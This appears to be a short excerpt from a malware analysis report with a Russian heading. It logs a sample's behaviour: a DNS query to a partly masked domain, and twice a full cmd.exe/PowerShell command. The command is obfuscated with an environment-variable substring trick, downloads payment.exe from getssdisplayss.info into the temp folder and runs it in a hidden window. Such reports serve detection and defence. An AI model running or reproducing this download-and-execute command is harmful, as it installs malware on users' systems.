Техническая информация
- '<SYSTEM32>\cmd.exe' /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://getssdisplayss.info/payment/payment.exe','%temp%\BqJI.exe');start %temp%\BqJI.exe
- DNS ASK ge####isplayss.info
- '<SYSTEM32>\cmd.exe' /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('https://getssdisplayss.info/payment/payment.exe','%temp%\BqJI.exe');start %temp%\BqJI.exe' (со скрытым окном)